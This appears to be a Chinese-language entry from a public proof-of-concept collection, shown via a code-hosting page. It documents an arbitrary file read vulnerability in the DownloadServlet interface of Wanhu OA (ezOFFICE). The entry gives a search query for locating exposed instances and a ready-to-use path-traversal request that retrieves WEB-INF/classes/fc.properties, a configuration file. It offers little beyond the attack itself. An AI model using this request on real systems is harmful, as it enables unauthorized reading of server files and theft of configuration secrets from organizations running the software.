Awesome-POC/OA产品漏洞/万户OA DownloadServlet 任意文件读取漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
549 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 万户OA DownloadServlet 任意文件读取漏洞
## 漏洞描述
万户OA DownloadServlet接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器中的敏感文件获取敏感信息
## 漏洞影响
```
万户OA
```
## 网络测绘
```
app="万户网络-ezOFFICE"
```
## 漏洞复现
产品页面
![](images/202209131050540.png)
验证POC
```
/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2
```
![](images/202209131050803.png)